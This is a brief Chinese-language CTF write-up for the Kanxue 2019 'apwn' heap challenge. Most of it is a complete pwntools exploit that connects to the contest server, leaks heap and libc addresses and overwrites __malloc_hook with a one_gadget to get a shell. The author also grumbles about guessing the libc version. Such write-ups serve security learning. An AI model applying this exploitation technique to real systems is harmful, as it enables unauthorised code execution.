Kanxuectf_2019_apwn
apwn 情境挺有意思的
start
题目没啥好说的…任意地址写 有leak
思路
leak heap libc & modify malloc_hook..
坑点.
做题10min环境5小时 不知是否故意为了增加做出时间不给libc.没给libc结果是2.27的…做的我一脸懵逼…然后我的ubuntu18又和服务器上有点区别我的一开始在init的时候会有一个0x410的tcache所以全靠幻想在做题…
坑死人了..题目半小时左右就做好了结果为了猜环境ubuntu14,16,kali,18全试过..有些机子还没有得docker搞了3,4个小时…
exp
from pwn import *
def cmd(c):
p.sendlineafter(">>\n",str(c))
def add_1(name=p64(0x21)*4):
cmd(1)
p.sendafter("Name:\n",name)
def add_2(name="YY"):
cmd(2)
p.sendafter("Name\n","YY")
p.sendafter("name\n",name)
def edit_1(idx,name):
cmd(3)
p.sendlineafter("which?\n",str(idx))
p.sendafter("luck.\n",name)
def edit_2(idx,name,pname):
cmd(4)
p.sendlineafter("which?\n",str(idx))
p.sendafter("name?\n",name)
p.sendafter("name\n",pname)
def free():
cmd(5)
libc=ELF("./libc-2.27.so")
#libc=ELF("./apwn").libc
#p=process("./apwn")
p=remote("211.159.175.39",8686)
#p=remote("127.0.0.1",1026)
add_1()#0
add_2()
edit_1((0x2e0-0x60)/8,'\x60')
p.readuntil("name: ")
heap=(u64(p.readuntil("1")[:-1].ljust(8,'\x00'))-0X60)#&0xfffffffffffff000
log.warning(hex(heap))
edit_2(0,"YY",p64(0)+p64(0x431))
edit_1((0x2e0-0x60)/8,p64(heap+0x70))
for x in range(60):
add_1()#1
free()
add_1("\n")
edit_1(60,"AAAAAAAA")
p.readuntil("name: AAAAAAAA")
base=u64(p.readuntil("1")[:-1].ljust(8,'\x00'))-(0x7fce69891090-0x7fce694a5000)
libc.address=base
log.warning(hex(base))
add_2()#1
edit_1((0x2e0-0x60)/8,p64(heap+0xa0))
edit_2(0,"YY",p64(libc.symbols['__malloc_hook']))
one=0x10a38c
edit_2(1,"YY",p64(one+base))
cmd(1)
#now 0
'''
0x45216 execve("/bin/sh", rsp+0x30, environ)
constraints:
rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL
0xf02a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
[rsp+0x50] == NULL
0xf1147 execve("/bin/sh", rsp+0x70, environ)
constraints:
'''
p.interactive()
#single 0x000000000202060+0x0000555555554000
#lucky 00000000002022E0